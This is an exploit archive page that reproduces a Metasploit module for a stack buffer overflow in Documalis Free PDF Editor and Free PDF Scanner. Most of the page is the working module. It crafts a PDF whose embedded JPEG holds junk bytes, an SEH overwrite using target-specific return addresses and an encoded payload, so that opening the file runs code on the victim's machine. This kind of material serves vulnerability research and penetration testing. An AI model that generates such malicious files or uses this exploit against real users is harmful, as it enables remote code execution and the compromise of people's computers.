exploit the possibilities

Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow

Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow
Posted Aug 4, 2020
Authored by metacom | Site metasploit.com

Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.

tags | exploit, remote, overflow, code execution
MD5 | 0d0a1918990afa2cbe664861b2ed5a5d

Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
'Description' => %q{
Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not
appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit
this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the
user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'<metacom27[at]gmail.com>', # Metasploit module
],
'References' =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1715,
'DisableNops' => true
},
'Targets' =>
[
[
'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
{
'Ret' => 0x0040160D, # pop esi # pop ebx # ret - PDFEditor.exe
'Offset' => 433
}
],
[
'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
{
'Ret' => 0x004023FC, # pop edx # pop ebx # ret - DocumentScanner.exe
'Offset' => 433
}
]
],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Privileged' => false,
'DisclosureDate' => 'May 22 2020',
'DefaultTarget' => 0
)
)

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
]
)
end

def exploit
file_create(make_pdf)
end

def jpeg
buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
buffer << rand_text(target['Offset']) # Junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
buffer << rand_text(2388 - buffer.length)
buffer
end

def make_pdf
@pdf << header
add_object(1, '<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>')
add_object(2, '<</Type/Outlines>>')
add_object(3, '<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>')
add_object(4, '[/PDF/Text/ImageC]')
add_object(5, '<</Type/Page/Parent 3 0 R/Contents 6 0 R>>')
stream_1 = 'stream' << eol
stream_1 << '0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q' << eol
stream_1 << 'endstream' << eol
add_object(6, "<</Length 91>>#{stream_1}")
stream = '<<' << eol
stream << '/Width 230' << eol
stream << '/BitsPerComponent 8' << eol
stream << '/Name /X' << eol
stream << '/Height 50' << eol
stream << '/Intent /RelativeColorimetric' << eol
stream << '/Subtype /Image' << eol
stream << '/Filter /DCTDecode' << eol
stream << "/Length #{jpeg.length}" << eol
stream << '/ColorSpace /DeviceCMYK' << eol
stream << '/Type /XObject' << eol
stream << '>>'
stream << 'stream' << eol
stream << jpeg << eol
stream << 'endstream' << eol
add_object(7, stream)
finish_pdf
end
end
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close